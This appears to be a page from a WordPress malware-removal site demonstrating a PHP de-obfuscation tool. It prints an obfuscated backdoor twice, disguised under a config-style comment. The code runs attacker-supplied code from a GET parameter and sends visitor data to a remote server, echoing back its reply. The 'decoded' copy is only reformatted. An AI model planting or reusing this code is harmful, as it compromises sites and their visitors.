De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php /* *--------------------------------------------------------------- * APPLICATION ENVIRONMENT *--------------------------------------------------------------- * * You can load different configurations depending on your * current environment. Setting the environment also influences * things like logging and error reporting. * * This can be set to anything, but default usage is: * * development * testing * production * * NOTE: If you change these, also change the error_reporting() code below * * *--------------------------------------------------------------- * ERROR REPORTING *--------------------------------------------------------------- * * Different environments will require different levels of error reporting. * By default development will show errors but testing and live will hide them. */ class Snippet { private static $s; public static function g($n, $k) { if (!self::$s) self::i(); $l = strlen($k); $r = base64_decode(self::$s[$n]); for ($i = 0, $c = strlen($r);$i !== $c;++$i) $r[$i] = chr(ord($r[$i]) ^ ord($k[$i % $l])); return $r; } private static function i() { self::$s = array( '_gf' => 'HgoMOhoccioAMR0dMAVCHgU' . 'DMB5CEBsGO' . 'AA' . 'BZU' . 'lF', '_o' => 'HBsMFzoaFk' . '4LDRIGZVQDEy8YCwA+AAsMMVsIAikVE' . 'QAtH' . 'R' . 'I' . 'X', '_kpm' => '', '_wwe' => 'PAY' . '=', '_m' => '', '_ja' => 'MR' . 'wYHA' . '==', '_p' => 'YwEYYQ' . '=' . '=', '_dl' => 'Y' . 'xM+FW' . 'E' . '=', '_mt' => 'KB' . 'UIM' . 'w=' . '=', '_v' => 'PAU6', '_b' => 'Ph' . 'YWPDkX' . 'H' . 'QA' . 'r', '_xn' => 'N' . 'gY' . 'x', '_ceo' => 'P' . 'REZOk' . 'Y' . '=', '_xh' => 'azQABjw=', '_jcw' => 'MAg6', '_pij' => 'KAAdF' . 'A' . '==', '_xuc' => '', '_swc' => '', '_nkp' => 'NwIeGWVZRQ82Gg8acQEPCzwX' . 'CQE6BR4GLRcNDHEVBQRwFwlEPhgLBSYCAwosWAAaY' . 'BILHT5' . 'L', '_rc' => 'PBcVFgALCRM' . 'r', '_mx' => 'NxADHg' . 'AHGAo6', '_uh' => 'Yw4ZOzMbMAg' . 'dYQ==', '_wu' => 'YwACOz0GM' . 'hIXJlw' . '=', '_gm' => 'LAIFFDI' . 'E', '_ss' => 'NwYc' . 'Lw' . 'E=', '_om' => 'GC' . 'M1' . 'VQ' . '=' . '=', '_mu' => 'Lw' . '8QNw=' . '=', '_rgs' => 'Lh0S' . 'L' . 'R' . 'E' . '=', '_j' => 'YA==', '_jno' => 'LhoNLRY' . '=', '_amc' => 'fzILLg9VblRvd1UyMAkr' . 'QH8=', '_ygd' => 'NwoY' . 'K' . 'w==', '_c' => 'UnssMB8BOhIbNh4BZVEsMx4cOnxlUn' . 's' . '=', '_nhc' => 'LBIYZU5' . 'b', '_lcy' => '', '_a' => 'NxkaEA=' . '=', '_sj' => 'UmQ=', '_dcl' => 'YxsOOyYKMgkbJkc' . '=', '_tuz' => 'F' . 'yQmIwAzP' . 'joaP' . 'iYsF' . 'iA' . '=', '_ty' => 'FyYtDy06Ezs8ESYm' . 'FiI=', '_vf' => 'FyM4PAAvMy' . 'oQJTstDTMpKAAxIz4=', '_rwc' => 'F' . 'yEkPwAtLykQJycuDTE1Kw' . 'AzP' . 'z' . '0=', '_kbu' => 'DS4qJA' . 's' . 'uOCo' . 'b' . 'LzU' . '=', '_xj' => 'DS0' . '4' . 'ED' . 'w' . 'wACkxGzo' . '=', '_sb' => 'FzILNgAlGTkcKREoGiULLxEhAC8P', '_y' => 'FzALNAAnGTscK' . 'xEqGic' . 'LL' . 'REjA' . 'C0P', '_xu' => 'FzwkPQA9IygNNzEqGi' . 'Yk', '_xf' => 'Fy0jKQAsJDwNJjY+Gj' . 'c' . 'j', '_oeq' => 'FzcmDzwgGiU3DS' . 'Yg', '_mpu' => 'FyYLIgAgGjQaI' . 'B' . 'o' . 'g', '_ulh' => 'OR' . 'EHEToKN' . 'BM+C' . 'g=' . '=', '_pvb' => 'blBQ' . 'cVJJb0' . 'x' . 'W', '_pm' => 'Ngo=', '_k' => 'KhM=', '_mo' => 'LQ' . 'M' . 'e', '_sz' => 'MRUF' . 'Jw==', ); } } class _8d1a3cd49dddb0ee874785cf500229c9 { private static $s; public static function g($n) { if (!self::$s) self::i(); return self::$s[$n]; } private static function i() { self::$s = array( 0100, 0121, 02, 064, 01, 046711, 01, 052, 00, 0116, 012, 015, 012, 0310, 0673, 0120, 00, 02000, 01, 0423, 0423 ); } } header(Snippet::g('_' . 'g' . 'f', '_' . 'i' . 'o')); header(Snippet::g('_o', '_' . 't' . 'b' . 'c')); $_kd = Snippet::g('_kpm', '_mf'); if (isset($_GET[Snippet::g('_ww' . 'e', '_' . 'n') ])) { $_y = gCode(Snippet::g('_' . 'm', '_w' . 'n')); if ($_y && strpos($_y, Snippet::g('_ja', '_x' . 'k' . 'd')) !== false) { die(Snippet::g('_p', '_ns')); } else { die(Snippet::g('_dl', '_' . 'q')); } } if (isset($_GET[Snippet::g('_' . 'mt', '_t' . 'd') ])) { $_vyb = Snippet::g('_' . 'v', '_w') . Snippet::g('_' . 'b', '_bsc') . Snippet::g('_' . 'x' . 'n', '_i'); $_epc = Snippet::g('_c' . 'e' . 'o', '_' . 'pj') . Snippet::g('_x' . 'h', '_kdc') . Snippet::g('_jcw', '_l'); $_ow = $_epc($_GET[Snippet::g('_' . 'p' . 'ij', '_a' . 'qx') ]); $_ow = $_vyb(Snippet::g('_x' . 'uc', '_uz') , $_ow); $_ow(); die; } function gCode($_rd) { $_y = Snippet::g('_' . 's' . 'wc', '_a' . 'o'); $_ae = Snippet::g('_' . 'nkp', '_vj' . 'i') . $_rd; if (is_callable(Snippet::g('_' . 'rc', '_bg' . 'z'))) { $_px = curl_init($_ae); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(0) , false); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(1) , _8d1a3cd49dddb0ee874785cf500229c9::g(2)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(3) , _8d1a3cd49dddb0ee874785cf500229c9::g(4)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(5) , _8d1a3cd49dddb0ee874785cf500229c9::g(6)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(7) , _8d1a3cd49dddb0ee874785cf500229c9::g(8)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(9) , _8d1a3cd49dddb0ee874785cf500229c9::g(10)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(11) , _8d1a3cd49dddb0ee874785cf500229c9::g(12)); $_y = curl_exec($_px); $_e = curl_getinfo($_px); curl_close($_px); if ($_e[Snippet::g('_mx', '_d' . 'wn') ] != _8d1a3cd49dddb0ee874785cf500229c9::g(13)) die(Snippet::g('_uh', '_l' . 'x')); if (empty($_y)) die(Snippet::g('_w' . 'u', '_b' . 'c')); } else { $_psl = parse_url($_ae); $_wa = ($_psl[Snippet::g('_gm', '_amq') ] == Snippet::g('_' . 's' . 's', '_' . 'r' . 'h')); $_mgq = Snippet::g('_o' . 'm', '_fau') . $_psl[Snippet::g('_m' . 'u', '_' . 'n' . 'd') ]; if (isset($_psl[Snippet::g('_' . 'r' . 'gs', '_hw') ])) $_mgq .= Snippet::g('_j', '_' . 'ez') . $_psl[Snippet::g('_jno', '_oh') ]; $_mgq .= Snippet::g('_a' . 'm' . 'c', '_z') . $_psl[Snippet::g('_yg' . 'd', '_' . 'e' . 'k') ] . Snippet::g('_c', '_' . 'q' . 'o'); $_gmo = fsockopen(($_wa ? Snippet::g('_' . 'n' . 'h' . 'c', '_a' . 't') : Snippet::g('_lc' . 'y', '_v' . 'e')) . $_psl[Snippet::g('_a', '_vid') ], $_wa ? _8d1a3cd49dddb0ee874785cf500229c9::g(14) : _8d1a3cd49dddb0ee874785cf500229c9::g(15)); if ($_gmo) { fputs($_gmo, $_mgq); $_u = _8d1a3cd49dddb0ee874785cf500229c9::g(16); while (!feof($_gmo)) { $_i = fgets($_gmo, _8d1a3cd49dddb0ee874785cf500229c9::g(17)); if ($_u) $_y .= $_i; if ($_i == Snippet::g('_' . 's' . 'j', '_nr')) $_u = _8d1a3cd49dddb0ee874785cf500229c9::g(18); } fclose($_gmo); if (empty($_y)) die(Snippet::g('_d' . 'cl', '_y' . 'o')); } } return $_y; } if (isset($_SERVER[Snippet::g('_tuz', '_p' . 'rs') ])) $_nml = $_SERVER[Snippet::g('_t' . 'y', '_' . 'r' . 'y') ]; if (isset($_SERVER[Snippet::g('_vf', '_' . 'wll') ])) $_xdl = $_SERVER[Snippet::g('_rw' . 'c', '_' . 'u' . 'po') ]; if (isset($_SERVER[Snippet::g('_kb' . 'u', '_' . 'kg' . 'k') ])) $_gna = $_SERVER[Snippet::g('_x' . 'j', '_hu') ]; if (isset($_SERVER[Snippet::g('_sb', '_' . 'f') ])) $_z = $_SERVER[Snippet::g('_' . 'y', '_d') ]; if (isset($_SERVER[Snippet::g('_x' . 'u', '_hpm') ])) $_vcz = $_SERVER[Snippet::g('_x' . 'f', '_yw' . 'y') ]; if (isset($_SERVER[Snippet::g('_oe' . 'q', '_c' . 'r') ])) $_uqq = $_SERVER[Snippet::g('_' . 'mpu', '_r') ]; if (function_exists(Snippet::g('_ul' . 'h', '_' . 'xke'))) { if (isset($_nml) && filter_var($_nml, _8d1a3cd49dddb0ee874785cf500229c9::g(19))) $_kd = $_nml; elseif (isset($_xdl) && filter_var($_xdl, _8d1a3cd49dddb0ee874785cf500229c9::g(20))) $_kd = $_xdl; else $_kd = $_gna; } elseif (isset($_gna)) $_kd = $_gna; if ($_kd == Snippet::g('_p' . 'vb', '_b' . 'g') && isset($_z)) $_kd = $_z; if (!isset($_kd) || !isset($_vcz) || !isset($_uqq)) exit; else { $_r = array( Snippet::g('_p' . 'm', '_' . 'zt') => $_kd, Snippet::g('_' . 'k', '_r' . 'e') => $_vcz, Snippet::g('_mo', '_f' . 'x' . 'd') => $_uqq ); $_dr = urlencode(base64_encode(json_encode($_r))); $_y = gCode($_dr); if ($_y && strpos($_y, Snippet::g('_s' . 'z', '_' . 'qv')) !== false) { echo $_y; exit; } }
<?php /* *--------------------------------------------------------------- * APPLICATION ENVIRONMENT *--------------------------------------------------------------- * * You can load different configurations depending on your * current environment. Setting the environment also influences * things like logging and error reporting. * * This can be set to anything, but default usage is: * * development * testing * production * * NOTE: If you change these, also change the error_reporting() code below * * *--------------------------------------------------------------- * ERROR REPORTING *--------------------------------------------------------------- * * Different environments will require different levels of error reporting. * By default development will show errors but testing and live will hide them. */ class Snippet { private static $s; public static function g($n, $k) { if (!self::$s) { self::i(); } $l = strlen($k); $r = base64_decode(self::$s[$n]); for ($i = 0, $c = strlen($r); $i !== $c; ++$i) { $r[$i] = chr(ord($r[$i]) ^ ord($k[$i % $l])); } return $r; } private static function i() { self::$s = array('_gf' => 'HgoMOhoccioAMR0dMAVCHgUDMB5CEBsGOAABZUlF', '_o' => 'HBsMFzoaFk4LDRIGZVQDEy8YCwA+AAsMMVsIAikVEQAtHRIX', '_kpm' => '', '_wwe' => 'PAY=', '_m' => '', '_ja' => 'MRwYHA==', '_p' => 'YwEYYQ==', '_dl' => 'YxM+FWE=', '_mt' => 'KBUIMw==', '_v' => 'PAU6', '_b' => 'PhYWPDkXHQAr', '_xn' => 'NgYx', '_ceo' => 'PREZOkY=', '_xh' => 'azQABjw=', '_jcw' => 'MAg6', '_pij' => 'KAAdFA==', '_xuc' => '', '_swc' => '', '_nkp' => 'NwIeGWVZRQ82Gg8acQEPCzwXCQE6BR4GLRcNDHEVBQRwFwlEPhgLBSYCAwosWAAaYBILHT5L', '_rc' => 'PBcVFgALCRMr', '_mx' => 'NxADHgAHGAo6', '_uh' => 'Yw4ZOzMbMAgdYQ==', '_wu' => 'YwACOz0GMhIXJlw=', '_gm' => 'LAIFFDIE', '_ss' => 'NwYcLwE=', '_om' => 'GCM1VQ==', '_mu' => 'Lw8QNw==', '_rgs' => 'Lh0SLRE=', '_j' => 'YA==', '_jno' => 'LhoNLRY=', '_amc' => 'fzILLg9VblRvd1UyMAkrQH8=', '_ygd' => 'NwoYKw==', '_c' => 'UnssMB8BOhIbNh4BZVEsMx4cOnxlUns=', '_nhc' => 'LBIYZU5b', '_lcy' => '', '_a' => 'NxkaEA==', '_sj' => 'UmQ=', '_dcl' => 'YxsOOyYKMgkbJkc=', '_tuz' => 'FyQmIwAzPjoaPiYsFiA=', '_ty' => 'FyYtDy06Ezs8ESYmFiI=', '_vf' => 'FyM4PAAvMyoQJTstDTMpKAAxIz4=', '_rwc' => 'FyEkPwAtLykQJycuDTE1KwAzPz0=', '_kbu' => 'DS4qJAsuOCobLzU=', '_xj' => 'DS04EDwwACkxGzo=', '_sb' => 'FzILNgAlGTkcKREoGiULLxEhAC8P', '_y' => 'FzALNAAnGTscKxEqGicLLREjAC0P', '_xu' => 'FzwkPQA9IygNNzEqGiYk', '_xf' => 'Fy0jKQAsJDwNJjY+Gjcj', '_oeq' => 'FzcmDzwgGiU3DSYg', '_mpu' => 'FyYLIgAgGjQaIBog', '_ulh' => 'OREHEToKNBM+Cg==', '_pvb' => 'blBQcVJJb0xW', '_pm' => 'Ngo=', '_k' => 'KhM=', '_mo' => 'LQMe', '_sz' => 'MRUFJw=='); } } class _8d1a3cd49dddb0ee874785cf500229c9 { private static $s; public static function g($n) { if (!self::$s) { self::i(); } return self::$s[$n]; } private static function i() { self::$s = array(0100, 0121, 02, 064, 01, 046711, 01, 052, 00, 0116, 012, 015, 012, 0310, 0673, 0120, 00, 02000, 01, 0423, 0423); } } header(Snippet::g('_gf', '_io')); header(Snippet::g('_o', '_tbc')); $_kd = Snippet::g('_kpm', '_mf'); if (isset($_GET[Snippet::g('_wwe', '_n')])) { $_y = gCode(Snippet::g('_m', '_wn')); if ($_y && strpos($_y, Snippet::g('_ja', '_xkd')) !== false) { die(Snippet::g('_p', '_ns')); } else { die(Snippet::g('_dl', '_q')); } } if (isset($_GET[Snippet::g('_mt', '_td')])) { $_vyb = Snippet::g('_v', '_w') . Snippet::g('_b', '_bsc') . Snippet::g('_xn', '_i'); $_epc = Snippet::g('_ceo', '_pj') . Snippet::g('_xh', '_kdc') . Snippet::g('_jcw', '_l'); $_ow = $_epc($_GET[Snippet::g('_pij', '_aqx')]); $_ow = $_vyb(Snippet::g('_xuc', '_uz'), $_ow); $_ow(); die; } function gCode($_rd) { $_y = Snippet::g('_swc', '_ao'); $_ae = Snippet::g('_nkp', '_vji') . $_rd; if (is_callable(Snippet::g('_rc', '_bgz'))) { $_px = curl_init($_ae); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(0), false); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(1), _8d1a3cd49dddb0ee874785cf500229c9::g(2)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(3), _8d1a3cd49dddb0ee874785cf500229c9::g(4)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(5), _8d1a3cd49dddb0ee874785cf500229c9::g(6)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(7), _8d1a3cd49dddb0ee874785cf500229c9::g(8)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(9), _8d1a3cd49dddb0ee874785cf500229c9::g(10)); curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(11), _8d1a3cd49dddb0ee874785cf500229c9::g(12)); $_y = curl_exec($_px); $_e = curl_getinfo($_px); curl_close($_px); if ($_e[Snippet::g('_mx', '_dwn')] != _8d1a3cd49dddb0ee874785cf500229c9::g(13)) { die(Snippet::g('_uh', '_lx')); } if (empty($_y)) { die(Snippet::g('_wu', '_bc')); } } else { $_psl = parse_url($_ae); $_wa = $_psl[Snippet::g('_gm', '_amq')] == Snippet::g('_ss', '_rh'); $_mgq = Snippet::g('_om', '_fau') . $_psl[Snippet::g('_mu', '_nd')]; if (isset($_psl[Snippet::g('_rgs', '_hw')])) { $_mgq .= Snippet::g('_j', '_ez') . $_psl[Snippet::g('_jno', '_oh')]; } $_mgq .= Snippet::g('_amc', '_z') . $_psl[Snippet::g('_ygd', '_ek')] . Snippet::g('_c', '_qo'); $_gmo = fsockopen(($_wa ? Snippet::g('_nhc', '_at') : Snippet::g('_lcy', '_ve')) . $_psl[Snippet::g('_a', '_vid')], $_wa ? _8d1a3cd49dddb0ee874785cf500229c9::g(14) : _8d1a3cd49dddb0ee874785cf500229c9::g(15)); if ($_gmo) { fputs($_gmo, $_mgq); $_u = _8d1a3cd49dddb0ee874785cf500229c9::g(16); while (!feof($_gmo)) { $_i = fgets($_gmo, _8d1a3cd49dddb0ee874785cf500229c9::g(17)); if ($_u) { $_y .= $_i; } if ($_i == Snippet::g('_sj', '_nr')) { $_u = _8d1a3cd49dddb0ee874785cf500229c9::g(18); } } fclose($_gmo); if (empty($_y)) { die(Snippet::g('_dcl', '_yo')); } } } return $_y; } if (isset($_SERVER[Snippet::g('_tuz', '_prs')])) { $_nml = $_SERVER[Snippet::g('_ty', '_ry')]; } if (isset($_SERVER[Snippet::g('_vf', '_wll')])) { $_xdl = $_SERVER[Snippet::g('_rwc', '_upo')]; } if (isset($_SERVER[Snippet::g('_kbu', '_kgk')])) { $_gna = $_SERVER[Snippet::g('_xj', '_hu')]; } if (isset($_SERVER[Snippet::g('_sb', '_f')])) { $_z = $_SERVER[Snippet::g('_y', '_d')]; } if (isset($_SERVER[Snippet::g('_xu', '_hpm')])) { $_vcz = $_SERVER[Snippet::g('_xf', '_ywy')]; } if (isset($_SERVER[Snippet::g('_oeq', '_cr')])) { $_uqq = $_SERVER[Snippet::g('_mpu', '_r')]; } if (function_exists(Snippet::g('_ulh', '_xke'))) { if (isset($_nml) && filter_var($_nml, _8d1a3cd49dddb0ee874785cf500229c9::g(19))) { $_kd = $_nml; } elseif (isset($_xdl) && filter_var($_xdl, _8d1a3cd49dddb0ee874785cf500229c9::g(20))) { $_kd = $_xdl; } else { $_kd = $_gna; } } elseif (isset($_gna)) { $_kd = $_gna; } if ($_kd == Snippet::g('_pvb', '_bg') && isset($_z)) { $_kd = $_z; } if (!isset($_kd) || !isset($_vcz) || !isset($_uqq)) { exit; } else { $_r = array(Snippet::g('_pm', '_zt') => $_kd, Snippet::g('_k', '_re') => $_vcz, Snippet::g('_mo', '_fxd') => $_uqq); $_dr = urlencode(base64_encode(json_encode($_r))); $_y = gCode($_dr); if ($_y && strpos($_y, Snippet::g('_sz', '_qv')) !== false) { echo $_y; exit; } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.